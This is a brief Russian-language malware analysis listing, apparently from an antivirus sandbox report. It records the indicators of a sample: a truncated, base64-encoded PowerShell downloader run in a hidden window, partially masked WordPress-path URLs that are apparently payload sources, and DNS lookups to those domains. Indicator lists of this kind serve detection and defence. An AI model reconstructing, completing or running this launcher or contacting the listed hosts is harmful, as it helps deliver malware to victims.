Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAFQAQQBIAEoAbwB5AGIAPQAnAFIARABDAFMAVgBlAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AGAAUgBJAGAAVABZAGAAUABgAFIAbwBUAG8AQwBvAEwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1616
- %TEMP%\1105610.cvr
- 'si######ararestaurante.net':80
- http://lo###izlee.com/wp-admin/Z6G5ZQ/
- http://www.io####lectvbc.com/z/1Cd/
- http://ba###rmedia.com/wp-content/Kn/
- http://www.ba###rmedia.com/wp-content/Kn/
- DNS ASK zo####trends.com
- DNS ASK lo###izlee.com
- DNS ASK io####lectvbc.com
- DNS ASK ba###rmedia.com
- DNS ASK si######ararestaurante.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAFQAQQBIAEoAbwB5AGIAPQAnAFIARABDAFMAVgBlAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AGAAUgBJAGAAVABZAGAAUABgAFIAbwBUAG8AQwBvAEwAIgAgAD...' (со скрытым окном)